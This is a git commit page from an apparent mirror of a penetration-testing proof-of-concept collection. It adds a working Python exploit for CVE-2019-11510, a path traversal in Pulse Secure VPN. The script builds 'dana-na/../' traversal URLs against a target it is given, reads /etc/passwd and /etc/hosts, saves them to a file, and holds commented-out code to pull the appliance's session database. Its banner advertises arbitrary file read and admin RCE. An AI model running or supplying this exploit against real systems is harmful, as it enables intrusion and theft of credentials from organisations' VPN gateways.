mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2026-06-01 20:56:58 +08:00
add CVE-2019-11510
This commit is contained in:
mr-xn
@@ -0,0 +1,93 @@
|
||||
import requests
|
||||
import requests.packages.urllib3
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
import os
|
||||
import sys
|
||||
|
||||
|
||||
banner = '''
|
||||
_______ ________ ___ ___ __ ___ __ __ _____ __ ___
|
||||
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ /_ | ____/_ |/ _ \
|
||||
| | \ \ / /| |__ ______ ) | | | || | (_) |______| || | |__ | | | | |
|
||||
| | \ \/ / | __|______/ /| | | || |\__, |______| || |___ \ | | | | |
|
||||
| |____ \ / | |____ / /_| |_| || | / / | || |___) || | |_| |
|
||||
\_____| \/ |______| |____|\___/ |_| /_/ |_||_|____/ |_|\___/
|
||||
|
||||
Any file read and admin Rce
|
||||
|
||||
python By jas502n
|
||||
'''
|
||||
print banner
|
||||
|
||||
def etc_passwd(url):
|
||||
file_read = ['/etc/passwd', '/etc/hosts']
|
||||
if url[-1] == '/':
|
||||
vuln_url_1 = url + 'dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[0]
|
||||
vuln_url_2 = url + 'dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[1]
|
||||
output = url[8:-1]
|
||||
|
||||
mdb_url = url + "dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/"
|
||||
else:
|
||||
vuln_url_1 = url + '/dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[0]
|
||||
vuln_url_2 = url + '/dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[1]
|
||||
output = url[8:]
|
||||
|
||||
mdb_url = url + "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/"
|
||||
|
||||
r1 = requests.get(vuln_url_1, verify=False)
|
||||
r2 = requests.get(vuln_url_2, verify=False)
|
||||
# r3 = requests.get(mdb_url, verify=False)
|
||||
|
||||
# print r3.status_code
|
||||
# print r3.content
|
||||
|
||||
# file_mdb = open("data_runtime_mtmp_lmdb_dataa_data.mdb",'ab')
|
||||
# file_mdb.write(r3.content)
|
||||
# file.close
|
||||
|
||||
|
||||
if r1.status_code == 200 and 'root:x' in r1.text:
|
||||
print
|
||||
print url + " ---------------> Vulnerable"
|
||||
print "Writing all files to output file " + output
|
||||
print "\nExtracting " + file_read[0]
|
||||
print
|
||||
print vuln_url_1
|
||||
print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
|
||||
print r1.text
|
||||
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
|
||||
|
||||
# os.system('mkdir %s' % output)
|
||||
|
||||
f = open("c.txt","wb")
|
||||
f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n')
|
||||
f.write(file_read[0] + '\n\n' + r1.text+'\n')
|
||||
f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n')
|
||||
|
||||
if r2.status_code == 200 and 'localhost' in r2.text:
|
||||
print "Extracting " + file_read[1]
|
||||
print
|
||||
print vuln_url_2
|
||||
print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
|
||||
print r2.text
|
||||
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
|
||||
f.write(file_read[1] + '\n\n' + r2.text+'\n')
|
||||
f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n')
|
||||
f.close()
|
||||
|
||||
|
||||
|
||||
else:
|
||||
print url + " ---------------> Not Vulnerable"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
url = sys.argv[1]
|
||||
etc_passwd(url)
|
||||
|
||||
Reference in New Issue
Block a user